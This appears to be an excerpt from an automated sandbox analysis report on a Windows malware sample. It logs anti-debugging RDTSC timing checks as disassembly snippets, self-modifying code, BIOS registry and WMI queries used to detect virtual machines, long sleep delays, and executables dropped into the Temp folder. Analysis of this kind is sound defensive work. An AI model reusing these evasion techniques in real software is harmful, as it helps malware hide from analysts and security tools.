Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCC335 second address: FCC33B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCC33B second address: FCC341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCC341 second address: FCC345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCC345 second address: FCC354 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB8E4E1E3B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCC4F1 second address: FCC4F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCC4F5 second address: FCC503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCC503 second address: FCC52A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A51Dh 0x00000007 jmp 00007FB8E4E1A526h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCC52A second address: FCC53F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB8E4E1E3C0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCC53F second address: FCC55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FB8E4E1A516h 0x0000000f jmp 00007FB8E4E1A51Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCC6A2 second address: FCC6AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB8E4E1E3B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCC6AC second address: FCC6DF instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB8E4E1A516h 0x00000008 jmp 00007FB8E4E1A525h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007FB8E4E1A51Eh 0x00000015 je 00007FB8E4E1A516h 0x0000001b pushad 0x0000001c popad 0x0000001d pop edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCCFC1 second address: FCCFC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCCFC5 second address: FCCFCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCCFCB second address: FCD009 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB8E4E1E3BFh 0x00000008 jno 00007FB8E4E1E3B6h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 jne 00007FB8E4E1E3B6h 0x0000001c jmp 00007FB8E4E1E3BFh 0x00000021 pop ebx 0x00000022 jp 00007FB8E4E1E3B8h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCD009 second address: FCD00E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCD7B8 second address: FCD7C5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB8E4E1E3B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCD7C5 second address: FCD7CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCB50C second address: FCB51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jnl 00007FB8E4E1E3B6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCB51B second address: FCB555 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A528h 0x00000007 jbe 00007FB8E4E1A516h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FB8E4E1A51Ah 0x00000015 jmp 00007FB8E4E1A51Bh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCB555 second address: FCB56D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 jmp 00007FB8E4E1E3BEh 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCB56D second address: FCB582 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A51Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FD5F1A second address: FD5F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FD5F1E second address: FD5F3B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB8E4E1A527h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FD595B second address: FD596E instructions: 0x00000000 rdtsc 0x00000002 je 00007FB8E4E1E3BCh 0x00000008 jo 00007FB8E4E1E3B6h 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FD596E second address: FD599A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB8E4E1A523h 0x0000000e jmp 00007FB8E4E1A520h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FE5829 second address: FE5842 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB8E4E1E3C4h 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FE5842 second address: FE5848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FE8546 second address: FE854A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FE854A second address: FE854E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FE854E second address: FE8556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F08756 second address: F0875B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F0875B second address: F08771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3C0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F08771 second address: F0879B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 jne 00007FB8E4E1A516h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 js 00007FB8E4E1A546h 0x00000017 push edi 0x00000018 jmp 00007FB8E4E1A520h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FEB9FA second address: FEBA0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007FB8E4E1E3B6h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FB8E4E1E3B6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FEBA0E second address: FEBA12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FF08F3 second address: FF08F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FF6149 second address: FF616E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jng 00007FB8E4E1A518h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 jmp 00007FB8E4E1A523h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FF83EE second address: FF8412 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB8E4E1E3B6h 0x00000008 jo 00007FB8E4E1E3B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 jmp 00007FB8E4E1E3C1h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FF8412 second address: FF8432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB8E4E1A529h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FF8432 second address: FF8464 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB8E4E1E3BCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007FB8E4E1E3BEh 0x00000011 pushad 0x00000012 popad 0x00000013 jbe 00007FB8E4E1E3B6h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB8E4E1E3BFh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FF8464 second address: FF8469 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FF9C17 second address: FF9C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FF9C1B second address: FF9C1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FF9C1F second address: FF9C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB8E4E1E3B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FF9C2B second address: FF9C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FF9C31 second address: FF9C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FF9C35 second address: FF9C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FFB232 second address: FFB238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FFB238 second address: FFB245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FB8E4E1A516h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FFB245 second address: FFB259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3C0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FFB259 second address: FFB264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FFB264 second address: FFB281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007FB8E4E1E3C0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FFB281 second address: FFB2A2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB8E4E1A528h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FFB2A2 second address: FFB2AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FB8E4E1E3BEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F127C1 second address: F127D4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FB8E4E1A51Bh 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 1009608 second address: 1009613 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007FB8E4E1E3B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 10098E8 second address: 1009907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8E4E1A525h 0x00000009 jg 00007FB8E4E1A516h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 1009A52 second address: 1009A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 1009A58 second address: 1009A5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 1009BB8 second address: 1009BBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 100A73E second address: 100A754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB8E4E1A516h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 popad 0x00000012 push ebx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 100D8D1 second address: 100D8D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 100D430 second address: 100D436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 100D436 second address: 100D43A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 1010EE4 second address: 1010EF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 10124A5 second address: 10124AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 10124AB second address: 10124B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB8E4E1A516h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 10124B6 second address: 10124CC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FB8E4E1E3C1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 10315B9 second address: 10315C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 10315C4 second address: 10315CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB8E4E1E3B6h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 10307E6 second address: 10307F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB8E4E1A516h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 10307F5 second address: 1030822 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB8E4E1E3B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jc 00007FB8E4E1E3D5h 0x00000012 jmp 00007FB8E4E1E3C9h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 103098F second address: 10309A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A526h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 10309A9 second address: 10309B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 10309B1 second address: 10309B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 10309B5 second address: 10309B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 1030C84 second address: 1030C88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 1031168 second address: 103117A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3BCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 10312FB second address: 10312FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 10312FF second address: 1031319 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3C6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 1031319 second address: 103131F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 103131F second address: 1031324 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 1031324 second address: 103132A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 1034455 second address: 103447C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3C4h 0x00000009 pop esi 0x0000000a jmp 00007FB8E4E1E3BEh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 103447C second address: 1034486 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB8E4E1A51Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 1035681 second address: 1035686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: 1035686 second address: 103568C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Special instruction interceptor: First address: DA9A52 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Special instruction interceptor: First address: F4EA3F instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Memory allocated: 52F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Memory allocated: 5560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Memory allocated: 52F0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Window / User API: threadDelayed 3902

Jump to behavior

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe TID: 7660	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com TID: 4364	Thread sleep time: -180000s >= -30000s			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 1_2_00406301 FindFirstFileW,FindClose,		1_2_00406301
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 1_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,		1_2_00406CC7

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\768400\	Jump to behavior
